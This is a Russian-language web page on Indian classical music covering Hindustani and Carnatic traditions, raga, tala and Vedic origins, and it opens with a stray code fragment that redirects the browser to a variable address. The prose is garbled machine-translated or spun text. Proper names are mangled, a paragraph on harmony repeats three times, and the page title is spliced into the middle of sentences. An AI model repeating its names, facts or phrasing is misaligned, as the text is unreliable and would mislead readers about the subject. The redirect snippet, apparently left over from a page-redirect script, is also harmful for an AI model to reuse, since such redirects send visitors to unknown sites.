window.location = \"$z_out\";";} ?>

Индийская классическая музыка

Особенности Индийской музыки

Индийская классическая музыка — жанр южно азиатской музыки.  Он имеет две основные традиции. Традиция классической музыки в Северной Индии называется Индустани, а южно индийское выражение называется Канатик.  Эти традиции не отличались до XVI века. Там, во время суматохи периода исламского правления индийского субконтинента, традиции разделились и превратились в различные формы.  Тем не менее две системы по-прежнему имеют более общие черты, чем различия.
Корни классической музыки Индии находятся в ведической литературе индуизма и древней, классическом тексте санскрита об исполнительском искусстве Баграты Мани. 13 — го века санскрита текст Шангит-Ратнакар из рассматриваются как окончательный текст как со стороной музыки хиндустани и Канатиком музыкой традицией.

                              Индийская классическая музыка имеет два основных элемента: рага и тала. Рага образует ткань мелодичных структур, то тала измеряет время цикла.  Рагу дает художнику палитру ингредиентов для создания мелодии из звуков, в то время как тала обеспечивает их с Индийская классическая музыкатворческой основой для ритмической импровизации с использованием времени. Dhrupads относятся к числу старейших классических индийских музыкальных композиций с героическими, хвалебными и духовными темами. Они являются основой для многих под жанров индийской музыки.

Индийская классическая музыка — одна из старейших художественных форм мира. Истоки можно найти в Ведах, которые являются самыми старыми писаниями в индуистской традиции, на нее также оказали значительное влияние или синтезировали индийскую народную музыку и персидскую музыку.
Индийскую классическую музыку можно разделить на две широкие категории: Индустани и Канатик.

Индийская музыка

Музыка Хиндустани в основном встречается в Северной Индии. Хаял и др упад — две его основные Индийская классическая музыкаформы, но есть несколько других классических и полу классических форм. В индуске музыке существует значительное количество персидского влияния с точки зрения инструментов, стиля представления и рогов, таких как Пиджак Бахилов, Баирами, Захар и Омон.
Когнатическая музыка из Южной Индии имеет тенденцию быть значительно более структурированной, чем музыка Хиндустани. Примерами этого являются логическая классификация ragas в мела картах и использование фиксированных композиций, подобных западной классической музыке. Когнатические рага разработки, как правило, намного быстрее в темпе и короче, чем их эквиваленты в музыке Хиндустани.

Музыка может быть социальной деятельностью, но она также может быть очень духовным опытом. Древние индейцы были глубоко впечатлён духовной силой музыки, и именно из этого появилась индийская классическая музыка. Итак, для тех, кто воспринимает это серьезно, классическая музыка включает в себя целеустремленность и преданность жизни. Но дело в музыке заключается в том, что вы можете воспринимать ее как серьезно или так небрежно, как вам нравится. Это полезный опыт, независимо от того, насколько глубоко или неглубоко ваша участь.

Индийская классическая музыкаУ большинства музыки есть как минимум три основных элемента — мелодия, ритм и гармония. Из-за своей созерцательной, духовной природы классика Хиндустани (северо индийская) — это одиночное преследование, которое фокусируется главным образом на мелодическом развитии. В исполнении ритм также играет важную роль, придавая мелодии текстуру, чувственность и чувство цели. Гармония в индийской классической музыке в основном принимает форму гармонического резонансного поля, поставляемого такими инструментами, как тонзура или swarmandal. Более сложную гармонию можно найти также с инструментами, такими как santoor, и часто как непреднамеренный результат гармонии, пытающейся скрыть главного вокалиста или инструменталиста с задержкой секунды. Пол мелодическое качество tabla добавляет третье измерение гармонии. Однако гармония в западном смысле не является частью традиционной индийской музыки, и важно не искать ее. И часто как непреднамеренный результат гармонии, пытающейся скрыть главного вокалиста или инструменталиста с задержкой секунды. Качество tabla добавляет третье измерение гармонии. Однако гармония в западном смысле не является частью традиционной индийской музыки, и важно не искать ее. И часто как непреднамеренный результат гармонии, пытающейся скрыть главного вокалиста или инструменталиста с задержкой секунды. Полу мелодическое качество tabla добавляет третье измерение гармонии. Однако гармония в западном смысле не является частью традиционной индийской музыки, и важно не искать ее.

Корни музыки в древней Индии находятся в ведической литературе индуизма. Самая ранняя Индийская классическая музыкаиндийская мысль сочетала в себе три искусства, силлабический концерт (Вадия), мелос (гита) и танцы (nrtta). [13] По мере развития этих полей Санита стала особым жанром искусства в форме, эквивалентной современной музыке. Вероятно, это произошло до Яицкой (около 500 г. до н. Э.), Поскольку он включает эти термины в свои исследования бирута, один из шести меконгов древнеиндийской традиции. Некоторые из древних текстов индуизма, таких как Самоеда (около 1000 г. до н. Э.), Полностью структурированы в мелодичных темах, [14] [15] это разделы Бигхеды, установленные для музыки. [16]
Samaveda организована в двух форматах. Одна часть основана на музыкальном метре, другая — на ритуалы. [17] Текст написан со встроенным кодированием, где svaras (октавное примечание) либо отображается выше, либо внутри текста, либо стих записывается в порваны (узел или член). Эти маркировки определяют, какие Юдиты следует спеть за один вздох, каждый блок основан на кратных восьмой. В гимнах Самоеды есть мелодическое содержание, форма, ритм и метрическая организация. [17] Эта структура, однако, не уникальна или ограничена Самоедки. Бигхеда встраивает музыкальный метр тоже Без какой-либо разработки, найденной в Самоеде. Например, мантра Гарри содержит три метрических строки ровно в восемь слогов с внедренным тройственным ритмом.

Язык музыки

Индийская классическая музыкаОдна из моих любимых вещей о классической музыке Хиндустани заключается в том, что вы очень хорошо ее изучаете, как вы изучаете язык. С языком, как только вы узнаете некоторые основные вещи, такие как грамматика и лексика, вы начинаете создавать свои собственные предложения. В классической музыке Хиндустани, как только вы узнаете основные ноты, вы познакомитесь с рогами (которые похожи на музыкальные темы), а затем вам предлагается начать импровизацию и создавать свои собственные мелодии. Это действительно не так сложно импровизировать мелодии в раге, с которой вы знакомы. Мне не хватает уровня таланта, чтобы стать исполнителем, но я могу создать спонтанную музыку, и это неисчерпаемый источник наслаждения.

Индийская классическая музыкаТаким образом, не нужно много импровизировать мелодии здесь и там, Но ему становится все труднее, когда вы пытаетесь импровизировать в координации с ритмом, а стать художником, способным часовыми внешними выступлениями, совсем другая история. Производительность должна иметь четкую структуру, она должна содержать определенные элементы, она должна прогрессировать согласованно, достигать кульминации и быть приведена к выводу, и она должна соответствовать определенным стандартам.

Достижение всего, что занимает много десятилетий обучения и обучения, и только редко вы найдете художника, которого можно воспринимать всерьез до 40 лет. Рага (также «raag») и Raga Performance.

Очень просто, рага — это музыкальная тема, созданная Выбрав определенный набор заметок из октавы. Музыка способна нас продвигать, потому что она может говорить с нашими самыми глубокими эмоциями через настроения, которые он создает. Различные наборы нот вызывают разные настроения и вдохновляют разные чувства.